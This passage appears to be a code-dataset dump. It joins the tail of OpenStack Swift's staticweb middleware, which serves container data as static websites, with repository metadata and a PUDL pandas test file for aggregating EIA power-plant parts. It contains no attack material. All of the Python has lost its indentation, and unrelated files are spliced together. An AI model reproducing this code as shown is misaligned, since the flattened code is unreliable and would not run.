Now 401's should load 401error.html, 404's should load 404error.html, etc.
Set Content-Type of directory marker object::
swift post -m 'web-directory-type:text/directory' container
Now 0-byte objects with a content-type of text/directory will be treated
as directories rather than objects.
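The same metadata can also be set directly against the Swift API. As a hedged
illustration (the token and storage URL below are placeholders for your
cluster)::
    curl -X POST -H "X-Auth-Token: $TOKEN" \
         -H "X-Container-Meta-Web-Index: index.html" \
         -H "X-Container-Meta-Web-Listings: true" \
         "$STORAGE_URL/container"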
"""
import json
import six
import time
from six.moves.urllib.parse import urlparse
from swift.common.request_helpers import html_escape
from swift.common.utils import human_readable, split_path, config_true_value, \
quote, get_logger
from swift.common.registry import register_swift_info
from swift.common.wsgi import make_env, WSGIContext
from swift.common.http import is_success, is_redirection, HTTP_NOT_FOUND
from swift.common.swob import Response, HTTPMovedPermanently, HTTPNotFound, \
Request, wsgi_quote, wsgi_to_str, str_to_wsgi
from swift.proxy.controllers.base import get_container_info
class _StaticWebContext(WSGIContext):
"""
The Static Web WSGI middleware filter; serves container data as a
static web site. See `staticweb`_ for an overview.
This _StaticWebContext is used by StaticWeb with each request
that might need to be handled to make keeping contextual
information about the request a bit simpler than storing it in
the WSGI env.
:param staticweb: The staticweb middleware object in use.
:param version: A WSGI string representation of the swift api version.
:param account: A WSGI string representation of the account name.
:param container: A WSGI string representation of the container name.
:param obj: A WSGI string representation of the object name.
"""
def __init__(self, staticweb, version, account, container, obj):
WSGIContext.__init__(self, staticweb.app)
self.version = version
self.account = account
self.container = container
self.obj = obj
self.app = staticweb.app
self.url_scheme = staticweb.url_scheme
self.url_host = staticweb.url_host
self.agent = '%(orig)s StaticWeb'
# Results from the last call to self._get_container_info.
self._index = self._error = self._listings = self._listings_css = \
self._dir_type = self._listings_label = None
def _error_response(self, response, env, start_response):
"""
Sends the error response to the remote client, possibly resolving a
custom error response body based on x-container-meta-web-error.
:param response: The error response we should default to sending.
:param env: The original request WSGI environment.
:param start_response: The WSGI start_response hook.
"""
if not self._error:
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return response
save_response_status = self._response_status
save_response_headers = self._response_headers
save_response_exc_info = self._response_exc_info
resp = self._app_call(make_env(
env, 'GET', '/%s/%s/%s/%s%s' % (
self.version, self.account, self.container,
self._get_status_int(), self._error),
self.agent, swift_source='SW'))
if is_success(self._get_status_int()):
start_response(save_response_status, self._response_headers,
self._response_exc_info)
return resp
start_response(save_response_status, save_response_headers,
save_response_exc_info)
return response
def _get_container_info(self, env):
"""
Retrieves x-container-meta-web-index, x-container-meta-web-error,
x-container-meta-web-listings, x-container-meta-web-listings-css,
and x-container-meta-web-directory-type from memcache or from the
cluster and stores the result in memcache and in self._index,
self._error, self._listings, self._listings_css and self._dir_type.
:param env: The WSGI environment dict.
:return: The container_info dict.
"""
self._index = self._error = self._listings = self._listings_css = \
self._dir_type = None
container_info = get_container_info(
env, self.app, swift_source='SW')
if is_success(container_info['status']):
meta = container_info.get('meta', {})
self._index = meta.get('web-index', '').strip()
self._error = meta.get('web-error', '').strip()
self._listings = meta.get('web-listings', '').strip()
self._listings_label = meta.get('web-listings-label', '').strip()
self._listings_css = meta.get('web-listings-css', '').strip()
self._dir_type = meta.get('web-directory-type', '').strip()
return container_info
def _listing(self, env, start_response, prefix=None):
"""
Sends an HTML object listing to the remote client.
:param env: The original WSGI environment dict.
:param start_response: The original WSGI start_response hook.
:param prefix: Any WSGI-str prefix desired for the container listing.
"""
label = wsgi_to_str(env['PATH_INFO'])
if self._listings_label:
groups = wsgi_to_str(env['PATH_INFO']).split('/')
label = '{0}/{1}'.format(self._listings_label,
'/'.join(groups[4:]))
if not config_true_value(self._listings):
body = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 ' \
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n' \
'<html>\n' \
'<head>\n' \
'<title>Listing of %s</title>\n' % html_escape(label)
if self._listings_css:
body += ' <link rel="stylesheet" type="text/css" ' \
'href="%s" />\n' % self._build_css_path(prefix or '')
else:
body += ' <style type="text/css">\n' \
' h1 {font-size: 1em; font-weight: bold;}\n' \
' p {font-size: 2}\n' \
' </style>\n'
body += '</head>\n<body>' \
' <h1>Web Listing Disabled</h1>' \
                ' <p>The owner of this web site has disabled web listing.</p>' \
' <p>If you are the owner of this web site, you can enable' \
' web listing by setting X-Container-Meta-Web-Listings.</p>'
if self._index:
body += '<h1>Index File Not Found</h1>' \
' <p>The owner of this web site has set ' \
' <b>X-Container-Meta-Web-Index: %s</b>. ' \
' However, this file is not found.</p>' % self._index
body += ' </body>\n</html>\n'
resp = HTTPNotFound(body=body)(env, self._start_response)
return self._error_response(resp, env, start_response)
tmp_env = make_env(
env, 'GET', '/%s/%s/%s' % (
self.version, self.account, self.container),
self.agent, swift_source='SW')
tmp_env['QUERY_STRING'] = 'delimiter=/'
if prefix:
tmp_env['QUERY_STRING'] += '&prefix=%s' % wsgi_quote(prefix)
else:
prefix = ''
resp = self._app_call(tmp_env)
if not is_success(self._get_status_int()):
return self._error_response(resp, env, start_response)
listing = None
body = b''.join(resp)
if body:
listing = json.loads(body)
if prefix and not listing:
resp = HTTPNotFound()(env, self._start_response)
return self._error_response(resp, env, start_response)
headers = {'Content-Type': 'text/html; charset=UTF-8'}
body = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 ' \
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n' \
'<html>\n' \
' <head>\n' \
' <title>Listing of %s</title>\n' % \
html_escape(label)
if self._listings_css:
body += ' <link rel="stylesheet" type="text/css" ' \
'href="%s" />\n' % (self._build_css_path(prefix))
else:
body += ' <style type="text/css">\n' \
' h1 {font-size: 1em; font-weight: bold;}\n' \
' th {text-align: left; padding: 0px 1em 0px 1em;}\n' \
' td {padding: 0px 1em 0px 1em;}\n' \
' a {text-decoration: none;}\n' \
' </style>\n'
body += ' </head>\n' \
' <body>\n' \
' <h1 id="title">Listing of %s</h1>\n' \
' <table id="listing">\n' \
' <tr id="heading">\n' \
' <th class="colname">Name</th>\n' \
' <th class="colsize">Size</th>\n' \
' <th class="coldate">Date</th>\n' \
' </tr>\n' % html_escape(label)
if prefix:
body += ' <tr id="parent" class="item">\n' \
' <td class="colname"><a href="../">../</a></td>\n' \
' <td class="colsize"> </td>\n' \
' <td class="coldate"> </td>\n' \
' </tr>\n'
for item in listing:
if 'subdir' in item:
subdir = item['subdir'] if six.PY3 else \
item['subdir'].encode('utf-8')
if prefix:
subdir = subdir[len(wsgi_to_str(prefix)):]
body += ' <tr class="item subdir">\n' \
' <td class="colname"><a href="%s">%s</a></td>\n' \
' <td class="colsize"> </td>\n' \
' <td class="coldate"> </td>\n' \
' </tr>\n' % \
(quote(subdir), html_escape(subdir))
for item in listing:
if 'name' in item:
name = item['name'] if six.PY3 else \
item['name'].encode('utf-8')
if prefix:
name = name[len(wsgi_to_str(prefix)):]
content_type = item['content_type'] if six.PY3 else \
item['content_type'].encode('utf-8')
bytes = human_readable(item['bytes'])
last_modified = (
html_escape(item['last_modified'] if six.PY3 else
item['last_modified'].encode('utf-8')).
split('.')[0].replace('T', ' '))
body += ' <tr class="item %s">\n' \
' <td class="colname"><a href="%s">%s</a></td>\n' \
' <td class="colsize">%s</td>\n' \
' <td class="coldate">%s</td>\n' \
' </tr>\n' % \
(' '.join('type-' + html_escape(t.lower())
for t in content_type.split('/')),
quote(name), html_escape(name),
bytes, last_modified)
body += ' </table>\n' \
' </body>\n' \
'</html>\n'
resp = Response(headers=headers, body=body)
return resp(env, start_response)
def _build_css_path(self, prefix=''):
"""
Constructs a relative path from a given prefix within the container.
URLs and paths starting with '/' are not modified.
:param prefix: The prefix for the container listing.
"""
if self._listings_css.startswith(('/', 'http://', 'https://')):
css_path = quote(self._listings_css, ':/')
else:
css_path = '../' * prefix.count('/') + quote(self._listings_css)
return css_path
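    # Hedged illustration (not part of the original method): for a listing of
    # the pseudo directory "sub/dir/" with X-Container-Meta-Web-Listings-CSS
    # set to "listing.css", prefix.count('/') is 2, so the link becomes
    # "../../listing.css"; values starting with "/", "http://" or "https://"
    # are only percent-quoted and otherwise passed through unchanged.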
def _redirect_with_slash(self, env_, start_response):
env = {}
env.update(env_)
if self.url_scheme:
env['wsgi.url_scheme'] = self.url_scheme
if self.url_host:
env['HTTP_HOST'] = self.url_host
resp = HTTPMovedPermanently(
location=wsgi_quote(env['PATH_INFO'] + '/'))
return resp(env, start_response)
def handle_container(self, env, start_response):
"""
Handles a possible static web request for a container.
:param env: The original WSGI environment dict.
:param start_response: The original WSGI start_response hook.
"""
container_info = self._get_container_info(env)
req = Request(env)
req.acl = container_info['read_acl']
# we checked earlier that swift.authorize is set in env
aresp = env['swift.authorize'](req)
if aresp:
resp = aresp(env, self._start_response)
return self._error_response(resp, env, start_response)
if not self._listings and not self._index:
if config_true_value(env.get('HTTP_X_WEB_MODE', 'f')):
return HTTPNotFound()(env, start_response)
return self.app(env, start_response)
if not env['PATH_INFO'].endswith('/'):
return self._redirect_with_slash(env, start_response)
if not self._index:
return self._listing(env, start_response)
tmp_env = dict(env)
tmp_env['HTTP_USER_AGENT'] = \
'%s StaticWeb' % env.get('HTTP_USER_AGENT')
tmp_env['swift.source'] = 'SW'
tmp_env['PATH_INFO'] += str_to_wsgi(self._index)
resp = self._app_call(tmp_env)
status_int = self._get_status_int()
if status_int == HTTP_NOT_FOUND:
return self._listing(env, start_response)
elif not is_success(self._get_status_int()) and \
not is_redirection(self._get_status_int()):
return self._error_response(resp, env, start_response)
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
def handle_object(self, env, start_response):
"""
Handles a possible static web request for an object. This object could
resolve into an index or listing request.
:param env: The original WSGI environment dict.
:param start_response: The original WSGI start_response hook.
"""
tmp_env = dict(env)
tmp_env['HTTP_USER_AGENT'] = \
'%s StaticWeb' % env.get('HTTP_USER_AGENT')
tmp_env['swift.source'] = 'SW'
resp = self._app_call(tmp_env)
status_int = self._get_status_int()
self._get_container_info(env)
if is_success(status_int) or is_redirection(status_int):
# Treat directory marker objects as not found
if not self._dir_type:
self._dir_type = 'application/directory'
content_length = self._response_header_value('content-length')
content_length = int(content_length) if content_length else 0
if self._response_header_value('content-type') == self._dir_type \
and content_length <= 1:
status_int = HTTP_NOT_FOUND
else:
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
if status_int != HTTP_NOT_FOUND:
# Retaining the previous code's behavior of not using custom error
# pages for non-404 errors.
self._error = None
return self._error_response(resp, env, start_response)
if not self._listings and not self._index:
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
status_int = HTTP_NOT_FOUND
if self._index:
tmp_env = dict(env)
tmp_env['HTTP_USER_AGENT'] = \
'%s StaticWeb' % env.get('HTTP_USER_AGENT')
tmp_env['swift.source'] = 'SW'
if not tmp_env['PATH_INFO'].endswith('/'):
tmp_env['PATH_INFO'] += '/'
tmp_env['PATH_INFO'] += str_to_wsgi(self._index)
resp = self._app_call(tmp_env)
status_int = self._get_status_int()
if is_success(status_int) or is_redirection(status_int):
if not env['PATH_INFO'].endswith('/'):
return self._redirect_with_slash(env, start_response)
start_response(self._response_status, self._response_headers,
self._response_exc_info)
return resp
if status_int == HTTP_NOT_FOUND:
if not env['PATH_INFO'].endswith('/'):
tmp_env = make_env(
env, 'GET', '/%s/%s/%s' % (
self.version, self.account, self.container),
self.agent, swift_source='SW')
tmp_env['QUERY_STRING'] = 'limit=1&delimiter=/&prefix=%s' % (
quote(wsgi_to_str(self.obj) + '/'), )
resp = self._app_call(tmp_env)
body = b''.join(resp)
if not is_success(self._get_status_int()) or not body or \
not json.loads(body):
resp = HTTPNotFound()(env, self._start_response)
return self._error_response(resp, env, start_response)
return self._redirect_with_slash(env, start_response)
return self._listing(env, start_response, self.obj)
class StaticWeb(object):
"""
The Static Web WSGI middleware filter; serves container data as a static
web site. See `staticweb`_ for an overview.
The proxy logs created for any subrequests made will have swift.source set
to "SW".
:param app: The next WSGI application/filter in the paste.deploy pipeline.
:param conf: The filter configuration dict.
"""
def __init__(self, app, conf):
#: The next WSGI application/filter in the paste.deploy pipeline.
self.app = app
#: The filter configuration dict. Only used in tests.
self.conf = conf
self.logger = get_logger(conf, log_route='staticweb')
        # We expose a more general "url_base" parameter in case we want
        # to incorporate the path prefix later. Currently only the scheme
        # and host are used; any path component is discarded.
url_base = conf.get('url_base', None)
self.url_scheme = None
self.url_host = None
if url_base:
parsed = urlparse(url_base)
self.url_scheme = parsed.scheme
self.url_host = parsed.netloc
def __call__(self, env, start_response):
"""
Main hook into the WSGI paste.deploy filter/app pipeline.
:param env: The WSGI environment dict.
:param start_response: The WSGI start_response hook.
"""
env['staticweb.start_time'] = time.time()
if 'swift.authorize' not in env:
self.logger.warning(
'No authentication middleware authorized request yet. '
'Skipping staticweb')
return self.app(env, start_response)
try:
(version, account, container, obj) = \
split_path(env['PATH_INFO'], 2, 4, True)
except ValueError:
return self.app(env, start_response)
if env['REQUEST_METHOD'] not in ('HEAD', 'GET'):
return self.app(env, start_response)
if env.get('REMOTE_USER') and \
not config_true_value(env.get('HTTP_X_WEB_MODE', 'f')):
return self.app(env, start_response)
if not container:
return self.app(env, start_response)
context = _StaticWebContext(self, version, account, container, obj)
if obj:
return context.handle_object(env, start_response)
return context.handle_container(env, start_response)
def filter_factory(global_conf, **local_conf):
"""Returns a Static Web WSGI filter for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
register_swift_info('staticweb')
def staticweb_filter(app):
return StaticWeb(app, conf)
return staticweb_filter
|
2532acae561f9626448d6ff9e8e297e668e75cbb
|
4e82d8497d6457cc47ade28494970d89e540aca5
|
/test/unit/analysis/plant_parts_eia_test.py
|
c333f59185a050910ecab6e26d6bb4d30507b6ac
|
[
"CC-BY-4.0",
"MIT"
] |
permissive
|
catalyst-cooperative/pudl
|
28f721a0caced2f50485fbba1b7c78f4465b2539
|
6afae8aade053408f23ac4332d5cbb438ab72dc6
|
refs/heads/main
| 2023-08-16T11:46:45.249665
| 2023-08-15T01:37:01
| 2023-08-15T01:37:01
| 80,646,423
| 382
| 101
|
MIT
| 2023-09-13T21:27:33
| 2017-02-01T17:45:40
|
Python
|
UTF-8
|
Python
| false
| false
| 21,551
|
py
|
plant_parts_eia_test.py
|
"""Tests for timeseries anomalies detection and imputation."""
from importlib import resources
from typing import Literal
import pandas as pd
import pudl
import pudl.analysis.plant_parts_eia
GENS_MEGA = pd.DataFrame(
{
"plant_id_eia": [1, 1, 1, 1],
"report_date": ["2020-01-01", "2020-01-01", "2020-01-01", "2020-01-01"],
"utility_id_eia": [111, 111, 111, 111],
"generator_id": ["a", "b", "c", "d"],
"prime_mover_code": ["ST", "GT", "CT", "CA"],
"energy_source_code_1": ["BIT", "NG", "NG", "NG"],
"ownership_record_type": [
"total",
"total",
"total",
"total",
],
"operational_status_pudl": ["operating", "operating", "operating", "operating"],
"capacity_mw": [400, 50, 125, 75],
}
).astype({"report_date": "datetime64[ns]"})
def test_plant_ag():
"""Test aggregation of the plant-part part list by plant.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant
plant_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": [1],
"report_date": ["2020-01-01"],
"operational_status_pudl": ["operating"],
"utility_id_eia": [111],
"ownership_record_type": ["total"],
"capacity_mw": [650.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(plant_ag_out, plant_ag_expected)
def test_prime_fuel_ag():
"""Test aggregation of the plant-part part list by prime fuel.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant prime fuel
plant_primary_fuel_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant_prime_fuel")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_primary_fuel_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"energy_source_code_1": ["BIT", "NG"],
"report_date": "2020-01-01",
"operational_status_pudl": "operating",
"utility_id_eia": 111,
"ownership_record_type": "total",
"capacity_mw": [400.0, 250.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(
plant_primary_fuel_ag_out, plant_primary_fuel_ag_expected
)
def test_prime_mover_ag():
"""Test aggregation of the plant-part part list by prime mover.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant prime mover
plant_prime_mover_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant_prime_mover")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_prime_mover_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"prime_mover_code": ["CA", "CT", "GT", "ST"],
"report_date": "2020-01-01",
"operational_status_pudl": "operating",
"utility_id_eia": 111,
"ownership_record_type": "total",
"capacity_mw": [75.0, 125.0, 50.0, 400.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(
plant_prime_mover_ag_out, plant_prime_mover_ag_expected
)
def test_plant_gen_ag():
"""Test aggregation of the plant-part part list by generator.
The only data col we are testing here is capacity_mw.
"""
# test aggregation by plant gen
plant_gen_ag_out = (
pudl.analysis.plant_parts_eia.PlantPart(part_name="plant_gen")
.ag_part_by_own_slice(GENS_MEGA, sum_cols=["capacity_mw"], wtavg_dict={})
.convert_dtypes()
)
plant_gen_ag_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"generator_id": ["a", "b", "c", "d"],
"report_date": "2020-01-01",
"operational_status_pudl": "operating",
"utility_id_eia": 111,
"ownership_record_type": "total",
"capacity_mw": [400.0, 50.0, 125.0, 75.0],
}
)
.astype({"report_date": "datetime64[ns]"})
.convert_dtypes()
)
pd.testing.assert_frame_equal(plant_gen_ag_out, plant_gen_ag_expected)
def test_make_mega_gen_tbl():
"""Test the creation of the mega generator table.
Integrates ownership with generators.
"""
# one plant with three generators
mcoe = pd.DataFrame(
{
"plant_id_eia": 1,
"report_date": "2020-01-01",
"generator_id": ["a", "b", "c"],
"utility_id_eia": [111, 111, 111],
"unit_id_pudl": 1,
"prime_mover_code": ["CT", "CT", "CA"],
"technology_description": "Natural Gas Fired Combined Cycle",
"operational_status": "existing",
"generator_retirement_date": pd.NA,
"capacity_mw": [50, 50, 100],
"generator_operating_date": "2001-12-01",
}
).astype(
{
"generator_retirement_date": "datetime64[ns]",
"report_date": "datetime64[ns]",
"generator_operating_date": "datetime64[ns]",
}
)
# one record for every owner of each generator
df_own_eia860 = pd.DataFrame(
{
"plant_id_eia": 1,
"report_date": "2020-01-01",
"generator_id": ["a", "b", "c", "c"],
"utility_id_eia": 111,
"owner_utility_id_eia": [111, 111, 111, 888],
"fraction_owned": [1, 1, 0.75, 0.25],
}
).astype({"report_date": "datetime64[ns]"})
out = pudl.analysis.plant_parts_eia.MakeMegaGenTbl().execute(
mcoe, df_own_eia860, slice_cols=["capacity_mw"]
)
out_expected = (
pd.DataFrame(
{
"plant_id_eia": 1,
"report_date": "2020-01-01",
"generator_id": ["a", "b", "c", "c", "a", "b", "c", "c"],
"unit_id_pudl": 1,
"prime_mover_code": ["CT", "CT", "CA", "CA", "CT", "CT", "CA", "CA"],
"technology_description": "Natural Gas Fired Combined Cycle",
"operational_status": "existing",
"generator_retirement_date": pd.NaT,
"capacity_mw": [50.0, 50.0, 75.0, 25.0, 50.0, 50.0, 100.0, 100.0],
"generator_operating_date": "2001-12-01",
"ferc_acct_name": "Other",
"generator_operating_year": 2001,
"operational_status_pudl": "operating",
"capacity_eoy_mw": [50, 50, 100, 100, 50, 50, 100, 100],
"fraction_owned": [1.00, 1.00, 0.75, 0.25, 1.00, 1.00, 1.00, 1.00],
"utility_id_eia": [111, 111, 111, 888, 111, 111, 111, 888],
"ownership_record_type": [
"owned",
"owned",
"owned",
"owned",
"total",
"total",
"total",
"total",
],
}
)
.astype(
{
"generator_retirement_date": "datetime64[ns]",
"report_date": "datetime64[ns]",
"generator_operating_date": "datetime64[ns]",
"generator_operating_year": "Int64",
"utility_id_eia": "Int64", # convert to pandas Int64 instead of numpy int64
}
)
.set_index([[0, 1, 2, 3, 0, 1, 2, 3]])
)
pd.testing.assert_frame_equal(out, out_expected)
def test_scale_by_ownership():
"""Test the scale_by_ownership method."""
dtypes = {"report_date": "datetime64[ns]", "utility_id_eia": pd.Int64Dtype()}
own_ex1 = pd.DataFrame(
{
"plant_id_eia": [1, 1, 1, 1],
"report_date": ["2019-01-01", "2019-01-01", "2019-01-01", "2019-01-01"],
"generator_id": ["a", "a", "b", "b"],
"utility_id_eia": [3, 3, 3, 3],
"owner_utility_id_eia": [3, 4, 3, 4],
"fraction_owned": [0.7, 0.3, 0.1, 0.9],
},
).astype(dtypes)
gens_mega_ex1 = pd.DataFrame(
{
"plant_id_eia": [1, 1],
"report_date": [
"2019-01-01",
"2019-01-01",
],
"generator_id": [
"a",
"b",
],
"utility_id_eia": [
3,
3,
],
"total_fuel_cost": [4500, 1250],
"net_generation_mwh": [10000, 5000],
"capacity_mw": [100, 50],
"capacity_eoy_mw": [100, 50],
"total_mmbtu": [9000, 7800],
},
).astype(dtypes)
out_ex1 = pd.DataFrame(
{
"plant_id_eia": [
1,
1,
1,
1,
1,
1,
1,
1,
],
"report_date": [
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
"2019-01-01",
],
"generator_id": [
"a",
"a",
"b",
"b",
"a",
"a",
"b",
"b",
],
"total_fuel_cost": [
4500 * 0.7,
4500 * 0.3,
1250 * 0.1,
1250 * 0.9,
4500,
4500,
1250,
1250,
],
"net_generation_mwh": [
10000 * 0.7,
10000 * 0.3,
5000 * 0.1,
5000 * 0.9,
10000,
10000,
5000,
5000,
],
"capacity_mw": [
100 * 0.7,
100 * 0.3,
50 * 0.1,
50 * 0.9,
100,
100,
50,
50,
],
"capacity_eoy_mw": [
100 * 0.7,
100 * 0.3,
50 * 0.1,
50 * 0.9,
100,
100,
50,
50,
],
"total_mmbtu": [
9000 * 0.7,
9000 * 0.3,
7800 * 0.1,
7800 * 0.9,
9000,
9000,
7800,
7800,
],
"fraction_owned": [0.7, 0.3, 0.1, 0.9, 1, 1, 1, 1],
"utility_id_eia": [3, 4, 3, 4, 3, 4, 3, 4],
"ownership_record_type": [
"owned",
"owned",
"owned",
"owned",
"total",
"total",
"total",
"total",
],
},
).astype(dtypes)
scale_cols = [
"total_fuel_cost",
"net_generation_mwh",
"capacity_mw",
"capacity_eoy_mw",
"total_mmbtu",
]
out = pudl.helpers.scale_by_ownership(
gens=gens_mega_ex1, own_eia860=own_ex1, scale_cols=scale_cols
).reset_index(drop=True)
pd.testing.assert_frame_equal(out_ex1, out)
def test_label_true_grans():
"""Test the labeling of true granularities in the plant part list."""
plant_part_list_input = pd.DataFrame(
{
"report_date": ["2020-01-01"] * 9,
"record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"gen_1",
"gen_2",
"gen_3",
"gen_4",
"tech_nat_gas",
"match_gen2_4",
],
"plant_id_eia": [3] * 9,
"plant_part": [
"plant",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_technology",
"plant_match_ferc1",
],
"generator_id": [None, None, None, 1, 2, 3, 4, None, None],
"unit_id_pudl": [None, "A", "B", "A", "B", "B", "B", None, None],
"technology_description": ["nat_gas"] * 9,
"operational_status_pudl": [None] * 9,
"utility_id_eia": [None] * 9,
"ownership_record_type": [None] * 9,
"prime_mover_code": [None] * 9,
"ferc_acct_name": [None] * 9,
"energy_source_code_1": [None] * 9,
"generator_operating_year": [None] * 9,
"installation_year": [None] * 9,
"construction_year": [None] * 9,
"ferc1_generator_agg_id": [None, None, None, None, 0, None, 0, None, 0],
}
).astype({"report_date": "datetime64[ns]"})
true_grans = pd.DataFrame(
{
"true_gran": [True, True, True, False, True, True, True, False, True],
"appro_record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"unit_a",
"gen_2",
"gen_3",
"gen_4",
"plant_3",
"match_gen2_4",
],
"appro_part_label": [
"plant",
"plant_unit",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant",
"plant_match_ferc1",
],
}
).astype({"appro_part_label": "string"})
expected_out = pd.concat([plant_part_list_input, true_grans], axis=1)
out = pudl.analysis.plant_parts_eia.TrueGranLabeler().execute(plant_part_list_input)
pd.testing.assert_frame_equal(expected_out, out)
class PudlTablMock:
"""Mock ``pudl_out`` object."""
freq: Literal["AS", "MS"]
def __init__(
self,
freq="AS",
):
self.freq = freq
def execute(self):
return self
def test_one_to_many():
plant_part_list_input = pd.DataFrame(
{
"report_date": ["2020-01-01"] * 8,
"record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"gen_1",
"gen_2",
"gen_3",
"gen_4",
"tech_nat_gas",
],
"plant_id_eia": [3] * 8,
"plant_name_eia": ["sparky"] * 8,
"plant_part": [
"plant",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_technology",
],
"generator_id": [None, None, None, 1, 2, 3, 4, None],
"unit_id_pudl": [1, 1, 2, 1, 2, 2, 2, 2],
"technology_description": ["nat_gas"] * 8,
"operational_status": ["operating"] * 8,
"operational_status_pudl": ["operating"] * 8,
"utility_id_eia": [1] * 8,
"ownership_record_type": ["total"] * 8,
"prime_mover_code": ["ch"] * 8,
"ferc_acct_name": ["test"] * 8,
"energy_source_code_1": ["source"] * 8,
"generator_operating_year": [1979] * 8,
"installation_year": [1979] * 8,
"construction_year": [1979] * 8,
"capacity_mw": [300] * 8,
"capacity_eoy_mw": [300] * 8,
"total_mmbtu": [10] * 8,
"net_generation_mwh": [100] * 8,
"total_fuel_cost": [100] * 8,
"fuel_cost_per_mwh": [1] * 8,
"heat_rate_mmbtu_mwh": [1] * 8,
"fuel_cost_per_mmbtu": [1] * 8,
"fuel_type_code_pudl": ["test"] * 8,
"planned_generator_retirement_date": [2076] * 8,
"generator_retirement_date": [2076] * 8,
}
).astype(
{
"report_date": "datetime64[ns]",
"generator_retirement_date": "datetime64[ns]",
"planned_generator_retirement_date": "datetime64[ns]",
}
)
path_to_one_to_many = resources.files("pudl.package_data.test").joinpath(
"test_one_to_many.csv",
)
pudl_out = PudlTablMock()
parts_compiler = pudl.analysis.plant_parts_eia.MakePlantParts(pudl_out)
one_to_many_df = (
parts_compiler.add_one_to_many(
plant_parts_eia=plant_part_list_input,
part_name="plant_match_ferc1",
path_to_one_to_many=path_to_one_to_many,
)
.convert_dtypes()
.set_index("record_id_eia")
)
plant_gen_one_to_many_expected = (
pd.DataFrame(
{
"report_date": ["2020-01-01"] * 9,
"record_id_eia": [
"plant_3",
"unit_a",
"unit_b",
"gen_1",
"gen_2",
"gen_3",
"gen_4",
"tech_nat_gas",
"3_0_2020_plant_match_ferc1_total_1",
],
"plant_id_eia": [3] * 9,
"plant_name_eia": ["sparky"] * 9,
"plant_part": [
"plant",
"plant_unit",
"plant_unit",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_gen",
"plant_technology",
"plant_match_ferc1",
],
"generator_id": [None, None, None, 1, 2, 3, 4, None, None],
"unit_id_pudl": [1, 1, 2, 1, 2, 2, 2, 2, 2],
"technology_description": ["nat_gas"] * 9,
"operational_status": [
"operating",
"operating",
"operating",
"operating",
"operating",
"operating",
"operating",
"operating",
None,
],
"operational_status_pudl": ["operating"] * 9,
"utility_id_eia": [1] * 9,
"ownership_record_type": ["total"] * 9,
"prime_mover_code": ["ch"] * 9,
"ferc_acct_name": ["test"] * 9,
"energy_source_code_1": ["source"] * 9,
"generator_operating_year": [1979] * 9,
"installation_year": [1979] * 9,
"construction_year": [1979] * 9,
"capacity_mw": [300, 300, 300, 300, 300, 300, 300, 300, 600],
"capacity_eoy_mw": [300, 300, 300, 300, 300, 300, 300, 300, 600],
"total_mmbtu": [10, 10, 10, 10, 10, 10, 10, 10, 20],
"net_generation_mwh": [100, 100, 100, 100, 100, 100, 100, 100, 200],
"total_fuel_cost": [100, 100, 100, 100, 100, 100, 100, 100, 200],
"fuel_cost_per_mwh": [1] * 9,
"heat_rate_mmbtu_mwh": [1] * 9,
"fuel_cost_per_mmbtu": [1] * 9,
"fuel_type_code_pudl": ["test"] * 9,
"planned_generator_retirement_date": [2076] * 9,
"generator_retirement_date": [2076] * 9,
"gen_id": [None, None, None, None, "gen_2", "gen_3", None, None, None],
"ferc1_generator_agg_id": [None, None, None, None, 0, 0, None, None, 0],
"fraction_owned": [None, None, None, None, None, None, None, None, 1],
"plant_part_id_eia": [
None,
None,
None,
None,
None,
None,
None,
None,
"3_0_plant_match_ferc1_total_1",
],
"plant_name_ppe": [
None,
None,
None,
None,
None,
None,
None,
None,
"sparky 0",
],
"record_count": [None, None, None, None, None, None, None, None, 1],
}
)
.astype(
{
"report_date": "datetime64[ns]",
"generator_retirement_date": "datetime64[ns]",
"planned_generator_retirement_date": "datetime64[ns]",
}
)
.convert_dtypes()
.set_index("record_id_eia")
)
pd.testing.assert_frame_equal(one_to_many_df, plant_gen_one_to_many_expected)
|
a6372b04d1a9180f03e23881edbaa67fd0e3cfe2
|
9d0228f3f7ee9cee0794319d4affc161b0a7adc2
|
/qmpy/web/views/api/optimade_api.py
|
bfee3b3a17eed1106664861ee60f0a1382a6e652
|
[
"MIT"
] |
permissive
|
wolverton-research-group/qmpy
|
